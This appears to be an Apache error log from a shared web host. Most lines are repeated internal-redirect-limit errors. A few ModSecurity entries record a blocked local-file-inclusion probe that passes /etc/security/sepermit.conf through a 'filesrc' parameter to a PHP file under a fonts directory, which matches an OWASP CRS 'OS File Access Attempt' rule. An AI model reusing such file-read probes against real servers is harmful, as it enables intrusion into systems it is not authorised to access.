[Mon May 11 18:44:40.503387 2026] [core:error] [pid 1412074:tid 1412078] [client 13.75.199.23:14117] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:40.503426 2026] [core:error] [pid 1412074:tid 1412078] [client 13.75.199.23:14117] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:41.262901 2026] [core:error] [pid 1411201:tid 1411252] [client 13.75.199.23:14089] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:41.262940 2026] [core:error] [pid 1411201:tid 1411252] [client 13.75.199.23:14089] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:42.076758 2026] [core:error] [pid 1411201:tid 1411265] [client 13.75.199.23:10506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:42.076797 2026] [core:error] [pid 1411201:tid 1411265] [client 13.75.199.23:10506] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:42.853723 2026] [core:error] [pid 1412074:tid 1412086] [client 13.75.199.23:8658] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:42.853757 2026] [core:error] [pid 1412074:tid 1412086] [client 13.75.199.23:8658] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:43.614055 2026] [core:error] [pid 1411055:tid 1411065] [client 13.75.199.23:10503] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:43.614087 2026] [core:error] [pid 1411055:tid 1411065] [client 13.75.199.23:10503] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:44.433906 2026] [core:error] [pid 1412074:tid 1412076] [client 13.75.199.23:14128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:44.433943 2026] [core:error] [pid 1412074:tid 1412076] [client 13.75.199.23:14128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:45.253340 2026] [core:error] [pid 1416109:tid 1416133] [client 13.75.199.23:10557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:45.253371 2026] [core:error] [pid 1416109:tid 1416133] [client 13.75.199.23:10557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:46.052478 2026] [core:error] [pid 1411099:tid 1411103] [client 13.75.199.23:14138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:46.052515 2026] [core:error] [pid 1411099:tid 1411103] [client 13.75.199.23:14138] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:46.817104 2026] [core:error] [pid 1411055:tid 1411068] [client 13.75.199.23:14106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:46.817132 2026] [core:error] [pid 1411055:tid 1411068] [client 13.75.199.23:14106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:47.577703 2026] [core:error] [pid 1416109:tid 1416150] [client 13.75.199.23:14140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:47.577739 2026] [core:error] [pid 1416109:tid 1416150] [client 13.75.199.23:14140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:48.398669 2026] [core:error] [pid 1424905:tid 1424928] [client 13.75.199.23:14116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:48.398699 2026] [core:error] [pid 1424905:tid 1424928] [client 13.75.199.23:14116] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:49.197400 2026] [core:error] [pid 1411055:tid 1411070] [client 13.75.199.23:3826] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:49.197434 2026] [core:error] [pid 1411055:tid 1411070] [client 13.75.199.23:3826] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:49.963789 2026] [core:error] [pid 1411201:tid 1411261] [client 13.75.199.23:3974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:49.963844 2026] [core:error] [pid 1411201:tid 1411261] [client 13.75.199.23:3974] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:50.723445 2026] [core:error] [pid 1411055:tid 1411079] [client 13.75.199.23:3951] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:50.723480 2026] [core:error] [pid 1411055:tid 1411079] [client 13.75.199.23:3951] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:50.894226 2026] [security2:error] [pid 1411201:tid 1411254] [client 216.73.216.110:58974] ModSecurity: Warning. Matched phrase "etc/security/sepermit.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/security/sepermit.conf found within ARGS:filesrc: /etc/security/sepermit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIHgvy_GXSWIKeli0sjpgAAAIg"]
[Mon May 11 18:44:50.895612 2026] [security2:error] [pid 1411201:tid 1411254] [client 216.73.216.110:58974] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIHgvy_GXSWIKeli0sjpgAAAIg"]
[Mon May 11 18:44:50.995982 2026] [security2:error] [pid 1411201:tid 1411254] [client 216.73.216.110:58974] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIHgvy_GXSWIKeli0sjpgAAAIg"]
[Mon May 11 18:44:51.482606 2026] [core:error] [pid 1411055:tid 1411072] [client 13.75.199.23:3463] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:51.482639 2026] [core:error] [pid 1411055:tid 1411072] [client 13.75.199.23:3463] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:52.266641 2026] [core:error] [pid 1411099:tid 1411106] [client 13.75.199.23:3490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:52.266672 2026] [core:error] [pid 1411099:tid 1411106] [client 13.75.199.23:3490] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:53.028205 2026] [core:error] [pid 1411055:tid 1411063] [client 13.75.199.23:3940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:53.028237 2026] [core:error] [pid 1411055:tid 1411063] [client 13.75.199.23:3940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:53.790616 2026] [core:error] [pid 1411201:tid 1411250] [client 13.75.199.23:3938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:53.790641 2026] [core:error] [pid 1411201:tid 1411250] [client 13.75.199.23:3938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:54.549965 2026] [core:error] [pid 1411099:tid 1411292] [client 13.75.199.23:3511] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:54.550007 2026] [core:error] [pid 1411099:tid 1411292] [client 13.75.199.23:3511] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:55.345256 2026] [core:error] [pid 1412074:tid 1412077] [client 13.75.199.23:3515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:55.345298 2026] [core:error] [pid 1412074:tid 1412077] [client 13.75.199.23:3515] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:56.211670 2026] [core:error] [pid 1411099:tid 1411111] [client 13.75.199.23:3777] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:56.211703 2026] [core:error] [pid 1411099:tid 1411111] [client 13.75.199.23:3777] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:56.988075 2026] [core:error] [pid 1416109:tid 1416134] [client 13.75.199.23:3232] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:56.988110 2026] [core:error] [pid 1416109:tid 1416134] [client 13.75.199.23:3232] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:57.782587 2026] [core:error] [pid 1412074:tid 1412082] [client 13.75.199.23:3497] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:57.782630 2026] [core:error] [pid 1412074:tid 1412082] [client 13.75.199.23:3497] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:58.561432 2026] [core:error] [pid 1411201:tid 1411253] [client 13.75.199.23:3937] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:58.561463 2026] [core:error] [pid 1411201:tid 1411253] [client 13.75.199.23:3937] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:59.320381 2026] [core:error] [pid 1416109:tid 1416135] [client 13.75.199.23:3940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:44:59.320414 2026] [core:error] [pid 1416109:tid 1416135] [client 13.75.199.23:3940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:01.096263 2026] [core:error] [pid 1411099:tid 1411124] [client 13.75.199.23:10900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:01.096303 2026] [core:error] [pid 1411099:tid 1411124] [client 13.75.199.23:10900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:01.898004 2026] [core:error] [pid 1411201:tid 1411252] [client 13.75.199.23:10934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:01.898038 2026] [core:error] [pid 1411201:tid 1411252] [client 13.75.199.23:10934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:02.708693 2026] [core:error] [pid 1411055:tid 1411065] [client 13.75.199.23:3985] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:02.708722 2026] [core:error] [pid 1411055:tid 1411065] [client 13.75.199.23:3985] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:03.493562 2026] [core:error] [pid 1411055:tid 1411071] [client 13.75.199.23:3973] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:03.493596 2026] [core:error] [pid 1411055:tid 1411071] [client 13.75.199.23:3973] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:04.301866 2026] [core:error] [pid 1411201:tid 1411255] [client 13.75.199.23:3909] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:04.301905 2026] [core:error] [pid 1411201:tid 1411255] [client 13.75.199.23:3909] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:05.093670 2026] [core:error] [pid 1424905:tid 1424920] [client 13.75.199.23:3948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:05.093705 2026] [core:error] [pid 1424905:tid 1424920] [client 13.75.199.23:3948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:05.854833 2026] [core:error] [pid 1416109:tid 1416133] [client 13.75.199.23:3630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:05.854888 2026] [core:error] [pid 1416109:tid 1416133] [client 13.75.199.23:3630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:06.615184 2026] [core:error] [pid 1412074:tid 1412099] [client 13.75.199.23:3590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:06.615215 2026] [core:error] [pid 1412074:tid 1412099] [client 13.75.199.23:3590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:07.380610 2026] [core:error] [pid 1411201:tid 1411254] [client 13.75.199.23:3615] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:07.380644 2026] [core:error] [pid 1411201:tid 1411254] [client 13.75.199.23:3615] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:08.175085 2026] [core:error] [pid 1412074:tid 1412091] [client 13.75.199.23:3627] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:08.175119 2026] [core:error] [pid 1412074:tid 1412091] [client 13.75.199.23:3627] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:08.955119 2026] [core:error] [pid 1424905:tid 1424918] [client 13.75.199.23:9630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:08.955146 2026] [core:error] [pid 1424905:tid 1424918] [client 13.75.199.23:9630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:09.737948 2026] [core:error] [pid 1416109:tid 1416151] [client 13.75.199.23:11106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:09.738932 2026] [core:error] [pid 1416109:tid 1416151] [client 13.75.199.23:11106] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:10.496001 2026] [core:error] [pid 1411201:tid 1411256] [client 13.75.199.23:15202] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:10.496029 2026] [core:error] [pid 1411201:tid 1411256] [client 13.75.199.23:15202] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:11.272977 2026] [core:error] [pid 1416109:tid 1416139] [client 13.75.199.23:15212] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:11.273113 2026] [core:error] [pid 1416109:tid 1416139] [client 13.75.199.23:15212] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:12.034066 2026] [core:error] [pid 1412074:tid 1412084] [client 13.75.199.23:11109] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:12.034100 2026] [core:error] [pid 1412074:tid 1412084] [client 13.75.199.23:11109] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:12.329190 2026] [autoindex:error] [pid 1411055:tid 1411078] [client 79.124.40.174:47470] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:45:12.858794 2026] [core:error] [pid 1411055:tid 1411061] [client 13.75.199.23:3599] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:12.858827 2026] [core:error] [pid 1411055:tid 1411061] [client 13.75.199.23:3599] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:13.672645 2026] [core:error] [pid 1411099:tid 1411105] [client 13.75.199.23:11131] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:13.672676 2026] [core:error] [pid 1411099:tid 1411105] [client 13.75.199.23:11131] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:14.499957 2026] [core:error] [pid 1411201:tid 1411246] [client 13.75.199.23:3742] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:14.499992 2026] [core:error] [pid 1411201:tid 1411246] [client 13.75.199.23:3742] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:15.341255 2026] [core:error] [pid 1416109:tid 1416138] [client 13.75.199.23:3735] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:15.341292 2026] [core:error] [pid 1416109:tid 1416138] [client 13.75.199.23:3735] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:16.140763 2026] [core:error] [pid 1411055:tid 1411058] [client 13.75.199.23:11104] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:16.140813 2026] [core:error] [pid 1411055:tid 1411058] [client 13.75.199.23:11104] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:16.902304 2026] [core:error] [pid 1411099:tid 1411104] [client 13.75.199.23:3595] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:16.902339 2026] [core:error] [pid 1411099:tid 1411104] [client 13.75.199.23:3595] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:17.704116 2026] [core:error] [pid 1424905:tid 1424921] [client 13.75.199.23:3738] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:17.704163 2026] [core:error] [pid 1424905:tid 1424921] [client 13.75.199.23:3738] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:18.490342 2026] [core:error] [pid 1412074:tid 1412096] [client 13.75.199.23:9659] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:18.490450 2026] [core:error] [pid 1412074:tid 1412096] [client 13.75.199.23:9659] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:19.253263 2026] [core:error] [pid 1424905:tid 1424923] [client 13.75.199.23:3588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:19.253299 2026] [core:error] [pid 1424905:tid 1424923] [client 13.75.199.23:3588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:20.020543 2026] [core:error] [pid 1411099:tid 1411113] [client 13.75.199.23:3365] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:20.020681 2026] [core:error] [pid 1411099:tid 1411113] [client 13.75.199.23:3365] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:20.863212 2026] [core:error] [pid 1411055:tid 1411059] [client 13.75.199.23:3386] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:45:20.863250 2026] [core:error] [pid 1411055:tid 1411059] [client 13.75.199.23:3386] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
